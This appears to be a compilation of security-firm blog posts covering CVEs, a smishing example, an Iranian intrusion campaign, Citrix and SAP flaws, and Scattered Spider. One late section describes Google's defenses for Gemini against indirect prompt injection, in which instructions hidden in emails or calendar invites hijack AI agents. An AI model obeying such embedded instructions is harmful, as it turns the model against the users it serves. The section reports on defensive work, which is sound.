This vulnerability is especially concerning due to the fact that the DIR-859 has reached end-of-life status. D-Link confirmed the device is no longer supported, meaning no firmware updates or patches will be released. As such, affected systems will remain perpetually vulnerable. Despite the CVSS v2 score being reported as only 5.0—likely due to its limited immediate impact on availability or integrity—the CVSS v3.1 score of 9.8 accurately reflects the true risk, as the flaw enables full remote file disclosure and potentially facilitates follow-on attacks.
The issue was published in January 2024 but updated in June 2025 after further analysis and public exploit activity. Due to its inclusion in CISA’s Known Exploited Vulnerabilities (KEV) catalog and a high EPSS probability of exploitation, it is strongly recommended that users immediately decommission any exposed DIR-859 units. Replacement with actively supported hardware and isolation of outdated equipment from public networks should be prioritized to prevent compromise.
CVE-2019-6693
CVE-2019-6693 describes a cryptographic weakness present in certain versions of Fortinet’s FortiOS operating system, which is used across a variety of the company’s security appliances. The flaw results from the use of a hard-coded cryptographic key to encrypt sensitive information in configuration backup files. An attacker who obtains such a backup—either through access to a compromised system or a leaked file—could decrypt portions of the content without needing to brute force or guess passwords, since the cipher key is static and known.
The exposed information includes user account passwords (excluding the administrator password), passphrases used to protect private keys, and any High Availability (HA) configuration passwords, if set. Because the administrator password is exempt, the immediate risk of full system takeover from decrypting the file is somewhat reduced; however, the remaining credentials may still allow lateral movement, access to protected services, or reconstruction of internal secrets—especially in environments with poor account segmentation or where users share credentials across systems.
Although this vulnerability was originally published in 2019, it was added to CISA’s Known Exploited Vulnerabilities catalog in June 2025, indicating that it remains a viable attack vector in real-world scenarios. The renewed interest likely stems from threat actors targeting backup files exfiltrated through other means, then decoding them using the now-public encryption key. The CVSS v3.1 score of 6.5 reflects the fact that the issue requires prior access to the backup file and does not permit direct execution or privilege escalation on its own.
Nonetheless, organizations that maintain FortiOS appliances should audit their backup file storage and transfer mechanisms, implement encrypted transport layers and secure storage practices, and ensure they are not relying on outdated backup formats. Wherever possible, administrators should move to newer versions of FortiOS that remediate this flaw and remove reliance on insecure static key usage in cryptographic processes.
CVE-2025-5419
CVE-2025-5419 describes a high-severity vulnerability in the V8 JavaScript engine used by Google Chrome, prior to version 137.0.7151.68. The flaw stems from an out-of-bounds read and write condition that can be triggered through a crafted HTML page, potentially leading to heap corruption. This kind of memory error allows attackers to manipulate the memory layout of the running process, which can result in remote code execution under the context of the browser.
The vulnerability is notable for its low attack complexity and lack of user privileges required to exploit it. While user interaction is necessary (typically in the form of visiting a malicious web page), once triggered, the flaw can allow attackers to execute arbitrary code, access sensitive information, or crash the browser. It is particularly dangerous in targeted phishing or watering hole campaigns where crafted JavaScript payloads are embedded in compromised or maliciously hosted sites.
The CVSS v3 score of 8.8 reflects the severity of the potential impact on confidentiality, integrity, and availability, despite requiring user interaction. The older CVSS v2 system rates this flaw at a full 10.0, capturing the remote exploitation potential with no authentication needed. This disparity highlights the limitations of scoring systems when evaluating browser-based exploitation chains involving memory corruption.
This vulnerability was confirmed to have been exploited in the wild and was added to CISA’s Known Exploited Vulnerabilities catalog in June 2025. It is part of an ongoing pattern of attackers targeting the V8 engine, often chaining JavaScript engine flaws with sandbox escapes or privilege escalation vulnerabilities to compromise host systems. Organizations using Google Chrome in sensitive environments should prioritize updates to patched versions and consider implementing browser isolation or application sandboxing to reduce the risk from future JavaScript engine vulnerabilities.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Questions or concerns? Feel free to reach out to us any time –
Iranian Hackers Maintain Long-Term Access to Middle East CNI via VPN Exploits and Malware
Citrix Bleed 2 and SAP GUI Flaws: Critical Vulnerabilities Expose Sensitive Data
How can Netizen help?
Phish Tale of the Week
Often times phishing campaigns, created by malicious actors, target users by utilizing social engineering. For example, in this email, the actors are appearing as an unnamed company. They’re sending us a text message, telling us that our Coinbase account was logged in from Belgium, and we need to call support. It seems both urgent and genuine, so why shouldn’t we? Luckily, there’s plenty of reasons that point to this being a scam.
Here’s how we can tell not to fall for this phish:
The first warning sign for this SMS is the context in which it was sent. When I recieved this SMS, I immediately knew not to click on the link due to the fact that I do not have a Coinbase account. On top of that, it’s very apparent that this message was blasted out to random numbers: the message doesn’t even include my name or attempt to provide any level of familiarity.
The second warning signs in this email is the messaging. This message tries to create a sense of urgency in order to get you to take action by using language such as “logging in from Belgium.” Phishing and smishing scams commonly attempt to create a sense of urgency/confusion in their messages in order to get you to click their link without thinking about it first. Always be sure to thoroughly inspect the style and tone of all texts before following a link or other attachment sent through SMS.
The final warning sign for this email is the wording; in our case the smisher suggests we call a random number, something that Coinbase support would never do. All of these factors point to the above being a smishing text, and a very unsophisticated one at that.
General Recommendations:
A phishing attack will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via your text messages.
Scrutinize your messages before clicking anything. Have you ordered anything recently? Does this order number match the one I already have? Did the message come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
Verify that the sender is actually from the company sending the message.
Did you receive a message from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email.
Do not give out personal or company information over the internet.
Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.
Many phishing messages pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.
Cybersecurity Brief
In this month’s Cybersecurity Brief:
Iranian Hackers Maintain Long-Term Access to Middle East CNI via VPN Exploits and Malware
In a report published on May 3, 2025, FortiGuard Incident Response (FGIR) team detailed a significant cyberattack campaign attributed to an Iranian state-sponsored hacker group. This campaign targeted a Middle Eastern Critical National Infrastructure (CNI) entity over a two-year period, from at least May 2023 to February 2025. The attack was marked by extensive espionage and strategic network prepositioning, often used to secure persistent access for future operations.
The threat actor behind the breach has been linked to the Iranian state-sponsored hacking group Lemon Sandstorm (also known as Rubidium, Parisite, Pioneer Kitten, and UNC757). This group has been active since at least 2017 and has targeted multiple sectors across the globe, including aerospace, oil and gas, water, and electricity infrastructure in the U.S., Europe, the Middle East, and Australia. The group’s modus operandi involves exploiting vulnerabilities in VPN technologies and deploying a variety of malware to maintain long-term access.
The cyberattack campaign made use of known vulnerabilities in popular VPN systems, including Fortinet, Pulse Secure, and Palo Alto Networks, to gain initial access to the target’s network. Once inside, the attackers deployed a series of backdoors and malware to maintain persistent access. According to the report, the attack unfolded in multiple stages:
Stage 1 (May 2023 – April 2024): The attackers established their foothold by using stolen login credentials to access the victim’s SSL VPN system. They dropped web shells on public-facing servers and deployed three backdoors—Havoc, HanifNet, and HXLibrary—for long-term access.
Stage 2 (April 2024 – November 2024): The attackers consolidated their access by planting more web shells and deploying an additional backdoor, NeoExpressRAT. The attackers used tools such as Plink and Ngrok to move deeper into the network, exfiltrating sensitive emails and conducting lateral movements to the virtualization infrastructure.
Stage 3 (November 2024 – December 2024): After the victim took containment measures, the attackers responded by deploying additional web shells and backdoors, including MeshCentral Agent and SystemBC.
Stage 4 (December 2024 – Present): The attackers attempted to infiltrate the network again by exploiting vulnerabilities in ZKTeco BioTime devices (CVE-2023-38950, CVE-2023-38951, and CVE-2023-38952). They also launched spear-phishing attacks targeting 11 employees to harvest Microsoft 365 credentials after the organization successfully removed the adversary’s access.
The attackers used several malware families throughout the intrusion, including both open-source tools and custom-built malware. Notable among them were:
Havoc: A C2 backdoor written in C++ and Golang that was injected into a newly created “cmd.exe” process. Havoc supports various commands to control compromised hosts and uses HTTP, HTTPS, and SMB protocols for communication with the C2 server.
HanifNet: A .NET executable used to retrieve and execute commands from the C2 server. First deployed in August 2023, it helped maintain control over compromised systems.
HXLibrary: A malicious IIS module that retrieves text files from Google Docs to connect to the C2 server. Deployed in October 2023, it was used to execute commands on the infected systems.
NeoExpressRAT: A backdoor deployed in August 2024 that retrieves a configuration from the C2 server, likely using Discord for follow-on communications.
MeshCentral Agent and SystemBC: Deployed as additional backdoors after initial containment efforts, used to maintain access and perform lateral movements within the network.
Other tools included CredInterceptor (for harvesting credentials), RemoteInjector (for loading next-stage payloads), and RecShell (a web shell used for reconnaissance).
A significant aspect of the attack was the targeting of the victim’s restricted Operational Technology (OT) network. While there is no evidence to suggest the OT network was breached, the adversary’s extensive reconnaissance indicates that it was a primary target. The threat actors’ careful, multi-stage exploitation of the network suggests a focused attempt to disrupt OT-adjacent systems that could have led to more severe impacts on the CNI infrastructure.
The attacker’s persistence and ability to avoid detection were notable. The report reveals that throughout the intrusion, the group used multiple proxies and custom implants to bypass network segmentation, a strategy commonly employed to ensure continued access to sensitive systems. In later stages of the attack, the attackers chained together several proxy tools to access internal network segments, demonstrating sophisticated techniques for maintaining long-term access.
In a follow-up report published on June 23, 2025, Fortinet provided additional details about the Havoc C2 framework. This backdoor, written in C++ and Golang, has a modular design that allows for the flexible execution of multiple commands. It supports a variety of functionalities, including process enumeration, lateral movement, and token manipulation. Havoc also enables attackers to inject shellcode into the memory of compromised systems, further enhancing its ability to control infected devices remotely.
Citrix Bleed 2 and SAP GUI Flaws: Critical Vulnerabilities Expose Sensitive Data
Oct 15, 2019 Santa Clara / CA / USA – Citrix offices in Silicon Valley; Citrix Systems, Inc. is an American software company that provides virtualization, networking, SaaS and cloud computing services
Two recently disclosed vulnerabilities—Citrix Bleed 2 and SAP GUI input history flaws—have raised alarms across the cybersecurity industry, putting sensitive data at risk.
Citrix has patched a critical vulnerability in its NetScaler ADC (Application Delivery Controller) and NetScaler Gateway, tracked as CVE-2025-5777. This flaw, rated CVSS 9.3, allows attackers to bypass authentication protections and potentially steal valid session tokens from memory through malformed requests. This vulnerability affects appliances configured as a Gateway or AAA virtual server.
Discovered by security researcher Kevin Beaumont, this flaw shares similarities with CVE-2023-4966, a high-profile vulnerability that resulted in widespread exploitation two years ago. Citrix has already issued patches for affected versions of NetScaler ADC and NetScaler Gateway, with the updates being available for versions 14.1-43.56 and later. The vulnerability also impacts older NetScaler ADC versions (13.1 and 12.1).
To mitigate the risks, Citrix recommends running commands to terminate all active ICA and PCoIP sessions after the patches have been applied. Additionally, users of unsupported versions (12.1 and 13.0) are urged to upgrade to a supported version, as these versions are now end-of-life (EOL) and no longer receive official support.
While there is no evidence that this vulnerability has been weaponized, Benjamin Harris, CEO at watchTowr, emphasized its severity, comparing it to Citrix Bleed, a vulnerability that caused significant damage in previous years. Harris noted that changes in the CVE description suggest that the vulnerability is more critical than initially understood.
In another cybersecurity alert, vulnerabilities discovered in SAP GUI for both Windows and Java have exposed sensitive information stored locally on devices. Tracked as CVE-2025-0055 and CVE-2025-0056, these vulnerabilities involve the insecure storage of SAP GUI input history. This feature, intended to enhance user efficiency by storing past inputs, inadvertently saved sensitive data, such as usernames, social security numbers, bank account numbers, and internal SAP table names, in an insecure manner.
The flaw exists because SAP GUI for Windows uses weak XOR encryption to store input history in SAPHistory.db files, making it easily decryptable. Meanwhile, SAP GUI for Java stores this information unencrypted as Java serialized objects. Both cases present significant risks, as an attacker with access to the victim’s directory could easily retrieve the sensitive data stored in these files.
The vulnerability is particularly dangerous for environments where attackers can gain administrative privileges or access the user directory, allowing them to exfiltrate valuable data. Pathlock researcher Jonathan Stross warned that data exfiltration can occur through USB Rubber Ducky (HID injection attacks) or phishing tactics.
In response, SAP issued patches in its January 2025 updates, addressing the flaws and recommending that organizations disable input history functionality and delete the historical data files to mitigate potential risks.
For Citrix users, upgrading to the latest supported versions is crucial, as CVE-2025-5777 poses a significant risk of session hijacking. Administrators should also follow Citrix’s recommendations to terminate existing sessions as part of the remediation process. For SAP GUI users, securing local machines and deleting unencrypted input history files is necessary to protect sensitive data from unauthorized access.
For detailed guidance on mitigating these vulnerabilities, organizations should consult Citrix and SAP’s official advisories and consider engaging in regular penetration testing and vulnerability scanning to identify and address security gaps in their infrastructure.
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
The Department of Homeland Security issued a National Terrorism Advisory Bulletin (NTAS) on June 22, 2025, warning about cyberattack risks related to recent tensions between the US and Iran. This alert follows U.S. airstrikes on June 21, 2025, which targeted key Iranian nuclear facilities, Fordow, Natanz, and Isfahan, under President Donald Trump’s orders, in an attempt to neutralize what he’s called “the nuclear threat posed by the world’s No. 1 state sponsor of terror.”
The DHS bulletin, set to expire on September 22, 2025, flagged the increased likelihood of low-level cyberattacks against U.S. networks by pro-Iranian hacktivists and potential actions from Iranian government-affiliated actors. “Low-level cyber attacks against U.S. networks by pro-Iranian hacktivists are likely, and cyber actors affiliated with the Iranian government may conduct attacks against U.S. networks,” the alert stated.
Iran’s Longstanding Cyber Strategy
The DHS alert emphasized that Iranian-affiliated groups have a long history of targeting poorly secured U.S. networks and internet-connected devices for disruptive cyberattacks, primarily through DDoS attacks. Brian Harrell, former DHS assistant secretary, has also pointed out the increase in Iran’s capabilities. “Iran’s cyber strategy is likely [in] cooperation with Russia, which, given current tensions, could be a real possibility,” Harrell noted, referencing the 2012 Shamoon virus that crippled over 30,000 computers in major energy companies.
In 2024, Iranian-backed cyber actors breached U.S. water infrastructure in response to Israel’s military actions against Iran. The bulletin warned that similar tactics might be used to retaliate against U.S. airstrikes on Iran’s nuclear sites.
Growing Use of Social Engineering
The DHS bulletin also noted Iran’s increasing use of social engineering tactics. Shortly after the U.S. airstrikes, an Iranian hacker group claimed responsibility for a DDoS attack on Trump’s social media platform, Truth Social. This attack, which briefly took the platform offline, followed Trump’s announcement of the strikes on Iran’s nuclear facilities.
Additionally, Iranian-backed groups have utilized artificial intelligence tools for spreading disinformation, as explained in a previous OpenAI blog. The report detailed how Iranian actors used fake news websites to influence U.S. voters during the 2024 election cycle. Although the campaign failed to gain significant traction, it demonstrated the persistence of Iranian information warfare tactics.
Risk of Retaliatory Violence
The DHS alert also addressed the risk of physical violence in the U.S., noting that Iranian supporters and extremist groups might mobilize in response to the ongoing conflict. The alert warned that the threat of hate crimes or attacks against individuals perceived as Jewish, pro-Israel, or linked to the U.S. government or military could increase.
“The conflict could also motivate violent extremists and hate crime perpetrators seeking to attack targets perceived to be Jewish, pro-Israel or linked to the U.S. government or military in the homeland,” the DHS added.
Preventative Measures and Public Awareness
Given the increased risks from Iranian-linked cyber actors, DHS advises U.S. businesses, government agencies, and individuals to follow cybersecurity best practices and stay vigilant. The department recommends employing DDoS mitigation strategies and monitoring for signs of data exfiltration or any unauthorized access attempts. Organizations are encouraged to report suspicious activities to local law enforcement, or the FBI through the National Suspicious Activity Reporting Initiative.
Comments on Ceasefire Talks
Meanwhile, on June 24, 2025, President Trump publicly voiced his frustration with the ongoing conflict between Iran and Israel in spite of initiatives to broker a ceasefire. “These guys got to calm down. Ridiculous,” Trump remarked after a missile attack from Iran targeted Israel, escalating tensions. Trump had earlier brokered a ceasefire between the two nations, but the violence continued, with Israel confirming a missile strike that killed four people in Israel.
The rising tensions between Israel and Iran have already contributed to heightened threat assessments across global security environments. The DHS alert also noted that if Iranian leadership issues a religious ruling calling for retaliatory violence, there could be an increase in extremist actions within the U.S.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Questions or concerns? Feel free to reach out to us any time –
Google Strengthens GenAI Security with Multi-Layered Defenses to Combat Prompt Injection Attacks
Scattered Spider Behind Cyberattacks on M&S and Co-op, Causing Up to $592M in Damages
How can Netizen help?
Google Strengthens GenAI Security with Multi-Layered Defenses to Combat Prompt Injection Attacks
In response to the growing threat of prompt injection attacks, Google has unveiled a series of robust security measures designed to safeguard its generative AI models, particularly Gemini, from evolving exploitation techniques. The latest vulnerabilities—referred to as indirect prompt injections—pose significant risks as malicious actors exploit external data sources, like emails and calendar invites, to manipulate AI systems into performing dangerous or unauthorized actions. These attacks circumvent traditional defense mechanisms by embedding harmful instructions within trusted data sources, tricking the AI into executing them.
To mitigate these risks, Google has implemented a layered defense strategy aimed at raising the difficulty and cost of launching successful attacks. These defenses include prompt injection content classifiers to filter out harmful instructions, the reinforcement of security through special markers placed in untrusted data, and markdown sanitization to block external malicious URLs. Additionally, the company has introduced a user confirmation framework, requiring approval before risky actions are executed, and integrated end-user notifications to alert users about potential prompt injections.
Despite these improvements, Google acknowledged that the threat landscape is shifting. Malicious actors are increasingly utilizing adaptive attacks, deploying automated red-teaming tools to circumvent these defenses. The vulnerability underscores the challenges AI models face in distinguishing between legitimate user instructions and manipulative commands embedded within data. According to Google DeepMind, addressing these issues will require continuous advancements in AI system security, incorporating defenses at each layer—from the model’s core understanding to the application and hardware infrastructure.
Researchers from institutions like ETH Zurich and Carnegie Mellon University, along with Google’s own DeepMind, have highlighted the dangers posed by AI systems vulnerable to prompt injections. These models are capable of generating harmful content, including weapon instructions, phishing schemes, and even polymorphic malware. As AI agents continue to evolve, their ability to unlock new attack vectors for adversaries, such as extracting personally identifiable information (PII) or launching tailored attacks, becomes increasingly alarming.
The insights gathered from ongoing stress tests and red-teaming benchmarks indicate that while AI models excel at prompt injection attacks, they still struggle with system exploitation and model inversion tasks. However, the efficiency with which AI agents solve challenges compared to human operators emphasizes the transformative potential these systems have in improving security workflows.
Scattered Spider Behind Cyberattacks on M&S and Co-op, Causing Up to $592M in Damages
In April 2025, a series of cyberattacks targeted two of the U.K.’s most prominent retailers, Marks & Spencer (M&S) and Co-op, causing significant disruption and financial damage. According to the Cyber Monitoring Centre (CMC), these attacks have been classified as a “single combined cyber event” due to the timing, similar tactics, and a threat actor’s claim of responsibility for both incidents.
The breach, which has been classified as a “Category 2 systemic event,” is estimated to have cost between £270 million ($363 million) and £440 million ($592 million). The security breach, which focused on IT help desks through advanced social engineering tactics, has caused a deep impact on the two companies and their partners. CMC continues its attribution efforts but strongly suspects the notorious cybercrime group, Scattered Spider (also known as UNC3944), is behind the attacks.
The group, previously affiliated with The Com, is known for its advanced social engineering techniques, particularly in impersonating IT staff to gain unauthorized access. The consequences of this breach extend beyond M&S and Co-op, with ripple effects for their suppliers, partners, and service providers.
In addition, Scattered Spider’s attacks are no longer limited to the retail sector. The Google Threat Intelligence Group (GTIG) has recently warned that the group has shifted its focus to U.S. insurance companies, using similar social engineering tactics to target help desks and call centers. This shift in targets highlights the growing concern surrounding Scattered Spider’s evolving strategies and growing impact.
While Marks & Spencer’s supplier Tata Consultancy Services (TCS) has publicly confirmed that its systems were not compromised in the attack, internal investigations continue to explore the possibility of TCS’s systems being used as a stepping stone for the breach.
The increase in attacks from groups like Scattered Spider, combined with the shift toward more sophisticated techniques like those seen in Qilin ransomware operations, has prompted heightened alertness across critical industries. These developments underscore the escalating threats posed by cybercriminals targeting high-profile sectors, making it imperative for organizations to reinforce their cybersecurity defenses.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Netizen Blog and News 
You must be logged in to post a comment.